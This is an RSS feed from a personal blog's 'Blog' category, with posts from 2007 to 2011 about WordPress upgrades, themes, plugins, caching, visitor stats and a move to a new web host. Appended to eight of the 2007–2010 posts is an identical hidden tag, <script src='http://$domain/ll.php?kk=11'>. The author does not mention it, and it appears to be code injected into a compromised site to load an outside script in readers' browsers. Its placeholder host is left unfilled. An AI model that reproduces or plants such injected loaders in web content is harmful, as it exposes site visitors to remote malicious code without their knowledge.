<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>anderswallin.net &#187; Blog</title>
	<atom:link href="http://www.anderswallin.net/category/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.anderswallin.net</link>
	<description></description>
	<lastBuildDate>Tue, 31 Jan 2012 20:09:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>New webhost - installing wordpress</title>
		<link>http://www.anderswallin.net/2011/09/hello-world/</link>
		<comments>http://www.anderswallin.net/2011/09/hello-world/#comments</comments>
		<pubDate>Sun, 04 Sep 2011 12:22:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=1</guid>
		<description><![CDATA[After leaving my bill unpaid at my old webhost, changing DNS-servers for my domain, and setting up a new webhosting account, the site is back up again on the new webhost, kapsi.fi. It went down sometime in the afternoon on Friday, and it started working again at noon on Sunday. I will install the plugins, [...]]]></description>
			<content:encoded><![CDATA[<p>After leaving my bill unpaid at my old webhost, changing DNS-servers for my domain, and setting up a new webhosting account, the site is back up again on the new webhost, <a href="http://www.kapsi.fi/">kapsi.fi</a>. It went down sometime in the afternoon on Friday, and it started working again at noon on Sunday.</p>
<p>I will install the plugins, upload pictures/attachments, and restore the database from the old site over the next few days...</p>
<p>WordPress install:</p>
<ul>
<li>Downloaded <a href="http://wordpress.org/download/">latest wordpres</a>s as a zip-file, unzipped on laptop and uploaded with FileZilla/FTP to webhost.</li>
<li>Edited wp-config.php by adding MySQL server name, database name, username, and password.</li>
<li>completed wordpress install by going  /wp-admin/install.php  and entering some info</li>
<li>Trying the <a href="http://wordpress.org/extend/themes/black-letterhead">Black-LetterHead 1.5</a> theme.</li>
</ul>
<p>Plugins:</p>
<ul>
<li>Akismet ships with wordpress, just have to activate it, and dig up my old API-key. <a href="http://www.akismet.com">akismet.com</a> now seems a bit more aggressive in wanting money than it did a few years back..</li>
<li><a href="http://wordpress.org/extend/plugins/latex/">Latex for wordpress</a> allows writing mathematical stuff like this: <span class='MathJax_Preview'><img src='http://www.anderswallin.net/wp-content/plugins/latex/cache/tex_ec30f5bf734de2dfe1f81e617e259653.gif' style='vertical-align: middle; border: none; ' class='tex' alt=" e^{i\pi}=-1 " /></span><script type='math/tex'> e^{i\pi}=-1 </script></li>
</ul>
<p><span class='MathJax_Preview'><img src='http://www.anderswallin.net/wp-content/plugins/latex/cache/tex_d459699ab031562a6c4fbb577db204bc.gif' style='vertical-align: middle; border: none; ' class='tex' alt="a^2 + b^2 = c^2" /></span><script type='math/tex'>a^2 + b^2 = c^2</script></p>
<ul>
<li><a href="http://wordpress.org/extend/plugins/wp-syntax/">WP-Syntax</a> should make any C/C++ or python code I blog about more readable.</li>
</ul>

<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">import</span> this <span style="color: #808080; font-style: italic;"># try this in your python shell!</span></pre></div></div>

<ul>
<li><a href="http://wordpress.org/extend/plugins/googleanalytics/">Google Analytics</a> allows tracking roughly how many visitors the site has. I have used google-analytics since about 2007, and the graph of visitors looks like this. I should sometime analyse if those traffic-peaks coincide with interesting posts, or being linked to on some popular page.</li>
</ul>
<p><a href="http://www.anderswallin.net/wp-content/uploads/2011/09/blog_stats.png"><img class="alignnone size-medium wp-image-4785" title="blog_stats" src="http://www.anderswallin.net/wp-content/uploads/2011/09/blog_stats-300x44.png" alt="" width="300" height="44" /></a></p>
<p>File+Database restore:</p>
<ul>
<li>I backed up the whole of /public_html from the old site. Have now restored most of the /wp-content directory which holds all pictures and attached files (PDF, movies, etc). This is about 1.5 Gb in total.</li>
<li>On the old wodpress-install I exported all posts, pages, and comments into an XML file which is about 7.5 Mb in size. This is now imported into the new site. This is 848 Posts, 8 Pages, 27 Categories, 384 Tags, and 750 Comments.</li>
<li>I'm not sure if everything went smoothly. In some cases it appears that images show up correctly in posts, in other cases the images/gallery is missing. This appears to be related to the wordpress Media Library being completely empty on the new site! Even though I uploaded all files to the same directories, and then did the XML-file import it seems that the Media Library is not imported correctly.</li>
<li>Update: it appears that the Import function chokes and I get "Internal server error" if the XML file is too large. I have now manually split the XML file into chunks of 1 Mb or less, and now the import function works better. I now have 2113 images and 2 videos in the Media Library. However they are all "Unattached", i.e. it appears wordpress doesn't know what images belong to what posts.</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2011/09/hello-world/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Changing web hosting service</title>
		<link>http://www.anderswallin.net/2011/09/changing-web-hosting-service/</link>
		<comments>http://www.anderswallin.net/2011/09/changing-web-hosting-service/#comments</comments>
		<pubDate>Thu, 01 Sep 2011 13:55:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=4706</guid>
		<description><![CDATA[I'm going to change the web hosting service for this blog. That means there might be a few days of down-time or other strange things happening during this or next week. Stay tuned for more blogging after the switch-over...]]></description>
			<content:encoded><![CDATA[<p>I'm going to change the web hosting service for this blog. That means there might be a few days of down-time or other strange things happening during this or next week. Stay tuned for more blogging after the switch-over... </p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2011/09/changing-web-hosting-service/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 3.0</title>
		<link>http://www.anderswallin.net/2010/06/wordpress-3-0/</link>
		<comments>http://www.anderswallin.net/2010/06/wordpress-3-0/#comments</comments>
		<pubDate>Fri, 18 Jun 2010 07:19:41 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[upgrade]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=3249</guid>
		<description><![CDATA[I've upgraded to the latest WordPress 3.0 The black theme looks too black for summer, must find something better. Hopefully some PIKANTO-building posts as well as new features and ideas for opencamlib (which nobody reads?) in store for July. Stay tuned.]]></description>
			<content:encoded><![CDATA[<p>I've upgraded to the latest <a href="http://wordpress.org/">WordPress 3.0</a></p>
<p>The black theme looks too black for summer, must <a href="http://wordpress.org/extend/themes/">find something</a> better.</p>
<p>Hopefully some <a href="http://www.anderswallin.net/pikanto/">PIKANTO</a>-building posts as well as new features and ideas for <a href="http://code.google.com/p/opencamlib/">opencamlib</a> (which<a href="http://www.freesteel.co.uk/wpblog/2010/06/foobar-found-at-mach2010/"> nobody reads?</a>) in store for July.</p>
<p>Stay tuned.<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2010/06/wordpress-3-0/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>blog stats</title>
		<link>http://www.anderswallin.net/2009/12/blog-stats/</link>
		<comments>http://www.anderswallin.net/2009/12/blog-stats/#comments</comments>
		<pubDate>Sat, 12 Dec 2009 09:56:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[stats]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=2160</guid>
		<description><![CDATA[This screenshot from google analytics shows visitor statistics from about the two past years. The youtube video I made with Ilkka about his board in July 2008 somehow got posted on some popular surfing or kite-boarding site and suddenly got 2-3000 views. The solar eclipse from August 1st 2008 also seems popular. Anyway, I seem [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.anderswallin.net/wp-content/uploads/2009/12/blog_popularity.jpg"><img class="alignnone size-medium wp-image-2159" title="blog_popularity" src="http://www.anderswallin.net/wp-content/uploads/2009/12/blog_popularity-625x155.jpg" alt="blog_popularity" width="625" height="155" /></a><br />
This screenshot from google analytics shows visitor statistics from about the two past years. The <a href="http://www.youtube.com/watch?v=k1v9sFfufQc">youtube video I made with Ilkka</a> about his board in July 2008 somehow got posted on some popular surfing or kite-boarding site and suddenly got 2-3000 views. The <a href="http://www.anderswallin.net/2008/08/partial-solar-eclipse/">solar eclipse from August 1st 2008</a> also seems popular.</p>
<p>Anyway, I seem to have a steady stream of 2-300 daily readers, so thanks for stopping by! And keep commenting and emailing - it helps to know someone actually reads or views these pages!<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2009/12/blog-stats/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New WordPress, new Theme</title>
		<link>http://www.anderswallin.net/2009/11/new-wordpress-new-theme/</link>
		<comments>http://www.anderswallin.net/2009/11/new-wordpress-new-theme/#comments</comments>
		<pubDate>Sun, 08 Nov 2009 10:37:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[theme]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/2009/11/new-wordpress-new-theme/</guid>
		<description><![CDATA[With the latest wordpress upgrade I decided to switch themes. This one is blacker and wider than the previous one, to make more room for wide pictures and videos.]]></description>
			<content:encoded><![CDATA[<p>With the latest wordpress upgrade I decided to switch themes. This one is blacker and wider than the previous one, to make more room for wide pictures and videos. <script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2009/11/new-wordpress-new-theme/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>WordPress 2.5</title>
		<link>http://www.anderswallin.net/2008/03/wordpress-25/</link>
		<comments>http://www.anderswallin.net/2008/03/wordpress-25/#comments</comments>
		<pubDate>Sat, 29 Mar 2008 23:36:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=259</guid>
		<description><![CDATA[WordPress 2.5 is out, and I've upgraded. Most of the shiny new stuff is on the admin side only, and so the outward look of the site remains. The upgrade went smoothly, with the usual tweaks to style.css for the ever changing header image and to put the blog title in the left upper corner. [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://wordpress.org/development/2008/03/wordpress-25-brecker/">WordPress 2.5 is out</a>, and I've upgraded. Most of the <a href="http://wordpress.org/development/2008/03/wordpress-25-rc2/">shiny new stuff</a> is on the admin side only, and so the outward look of the site remains.</p>
<p>The upgrade went smoothly, with <a href="http://www.anderswallin.net/2007/01/tweaking-the-header/">the usual tweaks</a> to style.css for the ever changing <a href="http://www.anderswallin.net/photos/">header image</a> and to put the blog title in the left upper corner.</p>
<p>I've started tagging my posts, and there's a new <a href="http://en.wikipedia.org/wiki/Tag_cloud">tag-cloud</a> at the top of the sidebar. I'll use it as a way of sub-categorizing posts without actually creating new categories. Once it's been in use for a while it will be useful for searching too.</p>
<p>Another recent update to the site is the list of WWW-links in the sidebar ("Anders' Web tips"). It's an RSS feed of the links I mark as 'shared' in <a href="http://www.google.com/reader/">google reader</a>. Hope you like them!<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2008/03/wordpress-25/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>wp-cache</title>
		<link>http://www.anderswallin.net/2007/10/wp-cache/</link>
		<comments>http://www.anderswallin.net/2007/10/wp-cache/#comments</comments>
		<pubDate>Thu, 25 Oct 2007 20:43:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/2007/10/wp-cache/</guid>
		<description><![CDATA[To make the site a bit faster I've downloaded and installed wp-cache. It's supposed to cache frequently accessed pages (like the front page) and potentially speed up the site a lot. Hope it works, you can comment below if you think the site is slower or faster than before. This seems like something so central [...]]]></description>
			<content:encoded><![CDATA[<p>To make the site a bit faster I've downloaded and installed <a href="http://wordpress.org/extend/plugins/wp-cache/">wp-cache</a>. It's supposed to cache frequently accessed pages (like the front page) and potentially speed up the site a lot. Hope it works, you can comment below if you think the site is slower or faster than before.</p>
<p>This seems like something so central to <a href="http://wordpress.org/">wordpress</a> that it should come with the default install?<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2007/10/wp-cache/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 2.3 etc.</title>
		<link>http://www.anderswallin.net/2007/09/wordpress-23-etc/</link>
		<comments>http://www.anderswallin.net/2007/09/wordpress-23-etc/#comments</comments>
		<pubDate>Tue, 25 Sep 2007 08:03:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/2007/09/wordpress-23-etc/</guid>
		<description><![CDATA[There's a new version of WordPress available, so I've upgraded. Unlike brand new buggy closed-source commercial software, I've found no problems with 2.3 "Dexter". I've been browsing through a lot of scientific papers lately, and was struck by just how bad Nature's doi resolving sometime is. Try this for example: http://dx.doi.org/10.1038/nature04268 You get to a [...]]]></description>
			<content:encoded><![CDATA[<p>There's <a href="http://wordpress.org/download/">a new version of WordPress available</a>, so I've upgraded. Unlike <a href="http://it.slashdot.org/article.pl?sid=07/09/24/2339203">brand new buggy closed-source commercial software</a>, I've found no problems with 2.3 "Dexter".</p>
<p>I've been browsing through a lot of scientific papers lately, and was struck by just how bad Nature's <a href="http://www.doi.org/">doi</a> resolving sometime is. Try this for example: <a href="http://dx.doi.org/10.1038/nature04268">http://dx.doi.org/10.1038/nature04268</a><br />
You get to a page with the article title, the authors, and the reference. But no sign of a link to the abstract, the HTML article, or the pdf article!?</p>
<p>I've also <a href="http://biocurious.com/pdf-organisation">found a discussion on various pdf/paper archiving services</a>. I'd like something that integrates well with <a href="http://www.endnote.com/">EndNote</a>, any ideas?<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2007/09/wordpress-23-etc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 2.2 with Widgets</title>
		<link>http://www.anderswallin.net/2007/05/wordpress-22-with-widgets/</link>
		<comments>http://www.anderswallin.net/2007/05/wordpress-22-with-widgets/#comments</comments>
		<pubDate>Mon, 28 May 2007 13:30:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/2007/05/wordpress-22-with-widgets/</guid>
		<description><![CDATA[I've upgraded to the latest WordPress, which now includes drag and drop customization of the sidebar using widgets. A nice new addition to the default install is the 'Recent Comments' widget. I had to switch to the new default theme that comes with 2.2, but after the usual mods the look of the site is [...]]]></description>
			<content:encoded><![CDATA[<p>I've upgraded to the <a href="http://wordpress.org/download/">latest WordPress</a>, which now includes drag and drop customization of the sidebar using <a href="http://codex.wordpress.org/Plugins/WordPress_Widgets">widgets</a>. A nice new addition to the default install is the 'Recent Comments' widget.</p>
<p>I had to switch to the new default theme that comes with 2.2, but after <a href="http://www.anderswallin.net/2007/01/tweaking-the-header/">the usual mods</a> the look of the site is back to normal.</p>
<p>I'm also experimenting with <a href="http://www.piepalace.ca/blog/projects/miniposts/">MiniPosts</a> to create a side-blog, or <a href="http://codex.wordpress.org/Adding_Asides">Asides</a>, for short comments/links.</p>
<p>In the future I'd like to include a <a href="http://en.wikipedia.org/wiki/Tag_cloud">tag-cloud</a> and maybe some stats-listing in the sidebar.<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2007/05/wordpress-22-with-widgets/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>WordPress 2.1</title>
		<link>http://www.anderswallin.net/2007/01/wordpress-21/</link>
		<comments>http://www.anderswallin.net/2007/01/wordpress-21/#comments</comments>
		<pubDate>Mon, 29 Jan 2007 21:09:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/2007/01/wordpress-21/</guid>
		<description><![CDATA[I've upgraded to the latest WordPress, release 2.1 Hopefully everything works as before. Funnily, the biggest new thing (besides 'boring' security fixes) advertized with 2.1 is a new visual editor for posts. But to my surprise I found it was not enabled by default! In the admin panel you need to go Users/Your Profile and [...]]]></description>
			<content:encoded><![CDATA[<p>I've upgraded to the latest WordPress, release 2.1</p>
<p>Hopefully everything works as before.</p>
<p>Funnily, the biggest new thing (besides 'boring' security fixes) advertized with 2.1 is a new visual editor for posts. But to my surprise I found it was not enabled by default! In the admin panel you need to go Users/Your Profile and check the "Use the visual editor when writing" tickbox to get the new and improved editor.</p>
<p>There's also a new spell-checker, but for me it errors out with a cryptic message <span style="font-weight: bold; font-style: italic">"</span><font style="font-weight: bold; font-style: italic" size="3">Could not execute AJAX call, server didn't return valid a XML."</font></p>
<p>For some reason I also needed to replace my &lt;code&gt;.htaccess&lt;/code&gt; file for everything to work.</p>
<p>Update: I'm still finding it quite annoying that  WordPress creates posts with no ALT tag when I insert images and don't bother to include some text in the ALT field. This results in errors when <a href="http://validator.w3.org/check/referer">doing XHTML validation</a>. So <a href="http://trac.wordpress.org/ticket/3744">I've filed a WordPress bug report</a>. Let's see what happens!<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2007/01/wordpress-21/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

